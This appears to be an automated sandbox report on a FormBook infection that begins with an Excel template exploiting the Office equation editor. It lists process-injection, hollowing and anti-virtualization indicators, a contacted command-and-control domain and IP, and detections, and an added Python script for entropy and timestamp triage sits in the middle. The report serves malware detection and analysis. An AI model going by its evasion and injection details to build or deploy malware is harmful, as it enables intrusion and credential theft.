            Source: Binary string: cscript.pdb source: FB_C479.tmp.exe, 00000007.00000002.2220113771.0000000000370000.00000040.00000001.sdmp

            Data Obfuscation:

            .NET source code contains potential unpacker
            Source: New_1007572_021[1].exe.2.dr, Cwzjibiwy.Expressions/SetterIdentifierExpression.cs .Net Code: SelectInitializer System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: tynex.exe.2.dr, Cwzjibiwy.Expressions/SetterIdentifierExpression.cs .Net Code: SelectInitializer System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: tynex.exe.4.dr, Cwzjibiwy.Expressions/SetterIdentifierExpression.cs .Net Code: SelectInitializer System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: 4.0.tynex.exe.11a0000.0.unpack, Cwzjibiwy.Expressions/SetterIdentifierExpression.cs .Net Code: SelectInitializer System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: 4.2.tynex.exe.11a0000.1.unpack, Cwzjibiwy.Expressions/SetterIdentifierExpression.cs .Net Code: SelectInitializer System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: 5.2.tynex.exe.380000.0.unpack, Cwzjibiwy.Expressions/SetterIdentifierExpression.cs .Net Code: SelectInitializer System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: 5.0.tynex.exe.380000.0.unpack, Cwzjibiwy.Expressions/SetterIdentifierExpression.cs .Net Code: SelectInitializer System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: New_1007572_021[1].exe.2.dr Static PE information: 0xDF29736D [Sun Aug 22 17:54:53 2088 UTC]
            Source: C:\Users\Public\tynex.exe Code function: 4_2_002919F0 push 0000006Ch; ret
            Source: C:\Users\Public\tynex.exe Code function: 4_2_00B50A5D push eax; retf 001Bh
            Source: C:\Users\Public\tynex.exe Code function: 4_2_00B53EF8 pushfd ; iretd
            Source: C:\Users\Public\tynex.exe Code function: 4_2_08193117 push edi; iretd
            Source: C:\Users\Public\tynex.exe Code function: 4_2_08193D79 pushfd ; iretd
            Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe Code function: 7_2_0135D12C push eax; ret
            Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe Code function: 7_2_0135D166 push dword ptr [CCC28DB9h]; ret
            Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe Code function: 7_2_01357140 push edi; retf
            Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe Code function: 7_2_01357814 push eax; retf
            Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe Code function: 7_2_0135D075 push eax; ret
            Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe Code function: 7_2_0135784D push eax; retf
            Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe Code function: 7_2_0135D0C2 push eax; ret
            Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe Code function: 7_2_0135D0CB push eax; ret
            Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe Code function: 7_2_0134EDBC push edx; retf
            Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe Code function: 7_2_0135C443 push eax; iretd
            Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe Code function: 7_2_0135E4EE push ds; iretd
            Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe Code function: 7_2_0135D773 push dword ptr [CCC28DB9h]; ret
            Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe Code function: 7_2_0099DFA1 push ecx; ret
            Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_025EDFA1 push ecx; ret
            Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_0008D075 push eax; ret
            Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_0008D0CB push eax; ret
            Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_0008D0C2 push eax; ret
            Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_0008D12C push eax; ret
            Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_00087140 push edi; retf
            Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_0008D166 push dword ptr [CCC28DB9h]; ret
            Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_0008C443 push eax; iretd
            Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_0008E4EE push ds; iretd
            Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_0008D773 push dword ptr [CCC28DB9h]; ret
            Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_00087814 push eax; retf
            Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_0008784D push eax; retf
            Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_0007EDBC push edx; retf
            Source: initial sample Static PE information: section name: .text entropy: 7.98710710749 (reported three times)
            Source: initial sample Static PE information: section name: .text entropy: 7.40373413401
            Source: C:\Users\user\AppData\Local\Temp\tynex.exe File created: C:\Users\user\AppData\Local\Temp\FB_BFF5.tmp.exe
            Source: C:\Users\user\AppData\Local\Temp\tynex.exe File created: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\tynex.exe
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\New_1007572_021[1].exe
            Source: C:\Users\Public\tynex.exe File created: C:\Users\user\AppData\Local\Temp\tynex.exe
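Two of the static indicators in this section are cheap to reproduce on any dropped file: a .text section whose entropy is close to 8 bits per byte (7.987 here, consistent with the .NET unpacker above loading an encrypted assembly via AppDomain::Load) and a COFF TimeDateStamp in the year 2088. The script below is an added example, not part of the report or of the sample: it parses the COFF header and section table, computes Shannon entropy per section, decodes the timestamp without relying on a 32-bit time_t, and flags the same two conditions. The PE it runs on is a minimal header constructed in the block around seeded pseudo-random bytes, not the real dropped file, and the entropy threshold of 7.0 is this script's own choice.

```python
"""Static triage of a dropped PE: per-section Shannon entropy and a sanity
check on the COFF TimeDateStamp. Added example, not part of the report; the
PE it runs on is constructed below, not the dropped file itself."""
import math
import random
import struct
from datetime import datetime, timedelta, timezone

IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000040
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000
EPOCH = datetime(1970, 1, 1, tzinfo=timezone.utc)


def shannon_entropy(data):
    """Bits per byte: 0.0 for empty or constant data, 8.0 for uniformly random bytes."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def parse_pe(blob):
    """Read the COFF header and section table; enough for timestamp and entropy."""
    if blob[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", blob, 0x3C)[0]
    if blob[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    _machine, nsect, timestamp, _, _, opt_size, _chars = struct.unpack_from("<HHIIIHH", blob, coff)
    sections = []
    for i in range(nsect):
        off = coff + 20 + opt_size + 40 * i  # 40-byte IMAGE_SECTION_HEADER entries
        name, _vsize, _va, rawsize, rawptr, _, _, _, _, sc = struct.unpack_from("<8sIIIIIIHHI", blob, off)
        data = blob[rawptr:rawptr + rawsize]
        sections.append({"name": name.rstrip(b"\0").decode("ascii", "replace"),
                         "characteristics": sc, "size": rawsize,
                         "entropy": shannon_entropy(data)})
    return {"timestamp": timestamp, "sections": sections}


def triage(blob, now=None, entropy_threshold=7.0):
    """Return (compile time as UTC datetime, list of human-readable findings)."""
    info = parse_pe(blob)
    now = now or datetime.now(timezone.utc)
    compiled = EPOCH + timedelta(seconds=info["timestamp"])  # portable past 2038
    findings = []
    if compiled > now:
        findings.append(f"timestamp in the future: 0x{info['timestamp']:08X} [{compiled:%a %b %d %H:%M:%S %Y} UTC]")
    for s in info["sections"]:
        executable = s["characteristics"] & (IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_CNT_CODE)
        if executable and s["entropy"] >= entropy_threshold:
            findings.append(f"section {s['name']} entropy {s['entropy']:.4f}: likely packed or encrypted")
        if executable and s["characteristics"] & IMAGE_SCN_MEM_WRITE:
            findings.append(f"section {s['name']} is writable and executable")
    return compiled, findings


def build_sample_pe(timestamp, text_bytes, data_bytes):
    """Constructed minimal PE: DOS header with e_lfanew=0x40, COFF header with
    no optional header, and two sections whose raw data starts at 0x200."""
    text_ptr, data_ptr = 0x200, 0x200 + len(text_bytes)
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, 2, timestamp, 0, 0, 0, 0x0102)

    def section(name, ptr, payload, chars):
        return struct.pack("<8sIIIIIIHHI", name, len(payload), 0x1000, len(payload), ptr, 0, 0, 0, 0, chars)

    headers = (dos + coff
               + section(b".text", text_ptr, text_bytes, IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ)
               + section(b".data", data_ptr, data_bytes, IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE))
    return headers.ljust(text_ptr, b"\0") + text_bytes + data_bytes


# Constructed sample: the report's timestamp, 64 KiB of seeded pseudo-random bytes
# standing in for an encrypted .text, and an all-zero .data section.
REPORT_TIMESTAMP = 0xDF29736D
_rng = random.Random(0xC479)
SAMPLE_PE = build_sample_pe(REPORT_TIMESTAMP,
                            bytes(_rng.getrandbits(8) for _ in range(64 * 1024)),
                            b"\0" * 4096)

if __name__ == "__main__":
    compiled, findings = triage(SAMPLE_PE)
    print(compiled.isoformat())
    for f in findings:
        print(f)
```

On the constructed sample the timestamp decodes to the same "Sun Aug 22 17:54:53 2088 UTC" the report prints, and .text scores about 7.997 bits per byte. A high-entropy executable section on its own only says the code is compressed or encrypted; paired with a timestamp that cannot be genuine it is a strong packer signal worth a dedicated rule.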

            Boot Survival:

            Drops PE files to the user root directory
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\tynex.exe
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX (14 occurrences)
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX (3 occurrences)
            Source: C:\Users\Public\tynex.exe Process information set: NOOPENFILEERRORBOX (26 occurrences)
            Source: C:\Users\user\AppData\Local\Temp\tynex.exe Process information set: NOOPENFILEERRORBOX (9 occurrences)
            Source: C:\Windows\SysWOW64\cscript.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion:

            Tries to detect virtualization through RDTSC time measurements
            Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe RDTSC instruction interceptor: First address: 00000000013498E4 second address: 00000000013498EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe RDTSC instruction interceptor: First address: 0000000001349B4E second address: 0000000001349B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\SysWOW64\cscript.exe RDTSC instruction interceptor: First address: 00000000000798E4 second address: 00000000000798EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\SysWOW64\cscript.exe RDTSC instruction interceptor: First address: 0000000000079B4E second address: 0000000000079B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe Code function: 7_2_01349A80 rdtsc
            Source: C:\Users\Public\tynex.exe Thread delayed: delay time: 922337203685477 (reported twice)
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2816 Thread sleep time: -300000s >= -30000s
            Source: C:\Users\Public\tynex.exe TID: 3004 Thread sleep time: -60000s >= -30000s
            Source: C:\Users\Public\tynex.exe TID: 824 Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\SysWOW64\cscript.exe TID: 2252 Thread sleep time: -30000s >= -30000s
            Source: C:\Windows\SysWOW64\cscript.exe Last function: Thread delayed
            Source: explorer.exe, 00000008.00000000.2169316587.00000000001F5000.00000004.00000020.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: explorer.exe, 00000008.00000000.2177502882.0000000004234000.00000004.00000001.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
            Source: explorer.exe, 00000008.00000000.2177529570.0000000004263000.00000004.00000001.sdmp Binary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}ies
            Source: explorer.exe, 00000008.00000000.2177502882.0000000004234000.00000004.00000001.sdmp Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
            Source: tynex.exe, 00000005.00000003.2165543256.0000000000541000.00000004.00000001.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
            Source: explorer.exe, 00000008.00000000.2177502882.0000000004234000.00000004.00000001.sdmp Binary or memory string: scsi\disk&ven_vmware&prod_virtual_disk\5&22be343f&0&000000
            Source: explorer.exe, 00000008.00000000.2177431267.00000000041AD000.00000004.00000001.sdmpBinary or memory string: ide\cdromnecvmwar_vmware_sata_cd01_______________1.00____\6&373888b8&0&1.0.0
            Source: C:\Users\Public\tynex.exeProcess information queried: ProcessInformation
            Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exeProcess queried: DebugPort
            Source: C:\Windows\SysWOW64\cscript.exeProcess queried: DebugPort
            Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exeCode function: 7_2_01349A80 rdtsc
            Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exeCode function: 7_2_0134ACC0 LdrLoadDll,
            Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exeCode function: 7_2_00980080 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exeCode function: 7_2_009800EA mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exeCode function: 7_2_009A26F8 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_025F26F8 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\tynex.exeProcess token adjusted: Debug
            Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exeProcess token adjusted: Debug
            Source: C:\Windows\SysWOW64\cscript.exeProcess token adjusted: Debug
            Source: C:\Users\Public\tynex.exeMemory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion:

            Allocates memory in foreign processes
            Source: C:\Users\Public\tynex.exe; Memory allocated: C:\Users\user\AppData\Local\Temp\tynex.exe base: 400000 protect: page execute and read and write
            Injects a PE file into a foreign process
            Source: C:\Users\Public\tynex.exe; Memory written: C:\Users\user\AppData\Local\Temp\tynex.exe base: 400000 value starts with: 4D5A
            Maps a DLL or memory area into another process
            Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe; Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
            Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe; Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
            Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe; Section loaded: unknown target: C:\Windows\SysWOW64\cscript.exe protection: execute and read and write
            Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe; Section loaded: unknown target: C:\Windows\SysWOW64\cscript.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\cscript.exe; Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
            Source: C:\Windows\SysWOW64\cscript.exe; Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe; Thread register set: target process: 1388
            Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe; Thread register set: target process: 1388
            Source: C:\Windows\SysWOW64\cscript.exe; Thread register set: target process: 1388
            Queues an APC in another process (thread injection)
            Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe; Thread APC queued: target process: C:\Windows\explorer.exe
            Sample uses process hollowing technique
            Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe; Section unmapped: C:\Windows\SysWOW64\cscript.exe base address: D00000
            Writes to foreign memory regions
            Source: C:\Users\Public\tynex.exe; Memory written: C:\Users\user\AppData\Local\Temp\tynex.exe base: 400000
            Source: C:\Users\Public\tynex.exe; Memory written: C:\Users\user\AppData\Local\Temp\tynex.exe base: 401000
            Source: C:\Users\Public\tynex.exe; Memory written: C:\Users\user\AppData\Local\Temp\tynex.exe base: 402000
            Source: C:\Users\Public\tynex.exe; Memory written: C:\Users\user\AppData\Local\Temp\tynex.exe base: 403000
            Source: C:\Users\Public\tynex.exe; Memory written: C:\Users\user\AppData\Local\Temp\tynex.exe base: 404000
            Source: C:\Users\Public\tynex.exe; Memory written: C:\Users\user\AppData\Local\Temp\tynex.exe base: 7EFDE008
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE; Process created: C:\Users\Public\tynex.exe C:\Users\Public\tynex.exe
            Source: C:\Users\Public\tynex.exe; Process created: C:\Users\user\AppData\Local\Temp\tynex.exe C:\Users\user\AppData\Local\Temp\tynex.exe
            Source: C:\Users\user\AppData\Local\Temp\tynex.exe; Process created: C:\Users\user\AppData\Local\Temp\FB_BFF5.tmp.exe 'C:\Users\user\AppData\Local\Temp\FB_BFF5.tmp.exe'
            Source: C:\Users\user\AppData\Local\Temp\tynex.exe; Process created: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe 'C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe'
            Source: C:\Windows\SysWOW64\cscript.exe; Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe'
            Source: explorer.exe, 00000008.00000000.2170029973.00000000006F0000.00000002.00000001.sdmp; Binary or memory string: Program Manager
            Source: explorer.exe, 00000008.00000000.2170029973.00000000006F0000.00000002.00000001.sdmp; Binary or memory string: Shell_TrayWnd
            Source: explorer.exe, 00000008.00000000.2169316587.00000000001F5000.00000004.00000020.sdmp; Binary or memory string: Progman
            Source: explorer.exe, 00000008.00000000.2170029973.00000000006F0000.00000002.00000001.sdmp; Binary or memory string: !Progman
            Source: C:\Users\Public\tynex.exe; Queries volume information: C:\Users\Public\tynex.exe VolumeInformation
            Source: C:\Users\Public\tynex.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Stealing of Sensitive Information:

            Yara detected FormBook
            Source: Yara match; File source: 7.0.FB_C479.tmp.exe.1340000.0.unpack, type: UNPACKEDPE
            Source: Yara match; File source: 4.2.tynex.exe.36294d0.3.unpack, type: UNPACKEDPE
            Source: Yara match; File source: 7.2.FB_C479.tmp.exe.1340000.4.unpack, type: UNPACKEDPE
            Source: Yara match; File source: 4.2.tynex.exe.39186d0.6.unpack, type: UNPACKEDPE
            Source: Yara match; File source: 5.2.tynex.exe.400000.1.unpack, type: UNPACKEDPE
            Source: Yara match; File source: 4.2.tynex.exe.37dba40.5.raw.unpack, type: UNPACKEDPE
            Source: Yara match; File source: 00000007.00000000.2165364225.0000000001341000.00000020.00020000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000007.00000002.2219948973.00000000000E0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match; File source: 00000009.00000002.2358933329.0000000000070000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match; File source: 00000004.00000002.2163601138.0000000003766000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match; File source: 00000005.00000002.2166292302.0000000000404000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match; File source: 00000009.00000002.2359161562.00000000001B0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match; File source: 00000009.00000002.2360905373.0000000002BFF000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match; File source: 00000009.00000002.2359102691.0000000000140000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match; File source: 00000007.00000002.2220838294.0000000001341000.00000020.00020000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000009.00000002.2359372203.0000000000792000.00000004.00000020.sdmp, type: MEMORY
            Source: Yara match; File source: 00000007.00000002.2220048817.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match; File source: 00000004.00000002.2163885582.000000000391C000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match; File source: 00000004.00000002.2163507996.000000000362D000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match; File source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe, type: DROPPED

            Remote Access Functionality:

            Yara detected FormBook
            Source: Yara match; File source: 7.0.FB_C479.tmp.exe.1340000.0.unpack, type: UNPACKEDPE
            Source: Yara match; File source: 4.2.tynex.exe.36294d0.3.unpack, type: UNPACKEDPE
            Source: Yara match; File source: 7.2.FB_C479.tmp.exe.1340000.4.unpack, type: UNPACKEDPE
            Source: Yara match; File source: 4.2.tynex.exe.39186d0.6.unpack, type: UNPACKEDPE
            Source: Yara match; File source: 5.2.tynex.exe.400000.1.unpack, type: UNPACKEDPE
            Source: Yara match; File source: 4.2.tynex.exe.37dba40.5.raw.unpack, type: UNPACKEDPE
            Source: Yara match; File source: 00000007.00000000.2165364225.0000000001341000.00000020.00020000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000007.00000002.2219948973.00000000000E0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match; File source: 00000009.00000002.2358933329.0000000000070000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match; File source: 00000004.00000002.2163601138.0000000003766000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match; File source: 00000005.00000002.2166292302.0000000000404000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match; File source: 00000009.00000002.2359161562.00000000001B0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match; File source: 00000009.00000002.2360905373.0000000002BFF000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match; File source: 00000009.00000002.2359102691.0000000000140000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match; File source: 00000007.00000002.2220838294.0000000001341000.00000020.00020000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000009.00000002.2359372203.0000000000792000.00000004.00000020.sdmp, type: MEMORY
            Source: Yara match; File source: 00000007.00000002.2220048817.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match; File source: 00000004.00000002.2163885582.000000000391C000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match; File source: 00000004.00000002.2163507996.000000000362D000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match; File source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe, type: DROPPED

            Mitre Att&ck Matrix

            Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
            Valid Accounts | Shared Modules1 | Path Interception | Process Injection712 | Masquerading111 | OS Credential Dumping | Security Software Discovery221 | Remote Services | Archive Collected Data1 | Exfiltration Over Other Network Medium | Encrypted Channel1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
            Default Accounts | Exploitation for Client Execution1 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Disable or Modify Tools1 | LSASS Memory | Process Discovery2 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Ingress Tool Transfer2 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
            Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Virtualization/Sandbox Evasion31 | Security Account Manager | Virtualization/Sandbox Evasion31 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
            Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Process Injection712 | NTDS | Remote System Discovery1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol112 | SIM Card Swap | | Carrier Billing Fraud
            Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Deobfuscate/Decode Files or Information1 | LSA Secrets | File and Directory Discovery1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
            Replication Through Removable Media | Launchd | Rc.common | Rc.common | Obfuscated Files or Information4 | Cached Domain Credentials | System Information Discovery113 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
            External Remote Services | Scheduled Task | Startup Items | Startup Items | Software Packing13 | DCSync | Network Sniffing | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
            Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Timestomp1 | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue

            Behavior Graph

            Behavior Graph ID: 458850
            Sample: New_1007572_021.xltx
            Start date: 03/08/2021
            Architecture: WINDOWS
            Score: 100
            Top-level signatures: Found malware configuration; Malicious sample detected (through community Yara rule); Multi AV Scanner detection for dropped file; 12 other signatures

            Process tree as rendered in the graph:
            • EXCEL.EXE (started)
              dropped: C:\Users\user\...\~$New_1007572_021.xltx (data)
            • EQNEDT32.EXE (started)
              contacted: inter-trading-service.com, 160.153.129.234, ports 49165, 80, GODADDY-AMSDE, United States
              dropped: C:\Users\user\...\New_1007572_021[1].exe (PE32); C:\Users\Public\tynex.exe (PE32)
              signatures: Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
              • tynex.exe (started)
                dropped: C:\Users\user\AppData\Local\Temp\tynex.exe (PE32)
                signatures: Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file; Writes to foreign memory regions; 2 other signatures
                • tynex.exe (started)
                  dropped: C:\Users\user\AppData\...\FB_C479.tmp.exe (PE32); C:\Users\user\AppData\...\FB_BFF5.tmp.exe (PE32)
                  signatures: Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file
                  • FB_C479.tmp.exe (started)
                    signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file; 5 other signatures
                    • explorer.exe (injected)
                      • cscript.exe (started)
                        signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
                        • cmd.exe (started)
                  • FB_BFF5.tmp.exe (started)

            Screenshots

            Thumbnails: windows-stand (screenshot images not reproduced in this text)

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            Source | Detection | Scanner | Label
            New_1007572_021.xltx | 39% | ReversingLabs | Document-OLE.Exploit.CVE-2017-11882

            Dropped Files

            Source | Detection | Scanner | Label
            C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe | 100% | Avira | TR/Crypt.ZPACK.Gen
            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\New_1007572_021[1].exe | 100% | Joe Sandbox ML |
            C:\Users\user\AppData\Local\Temp\tynex.exe | 100% | Joe Sandbox ML |
            C:\Users\Public\tynex.exe | 100% | Joe Sandbox ML |
            C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe | 100% | Joe Sandbox ML |
            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\New_1007572_021[1].exe | 28% | ReversingLabs | ByteCode-MSIL.Spyware.Noon
            C:\Users\user\AppData\Local\Temp\FB_BFF5.tmp.exe | 5% | Metadefender |
            C:\Users\user\AppData\Local\Temp\FB_BFF5.tmp.exe | 2% | ReversingLabs |
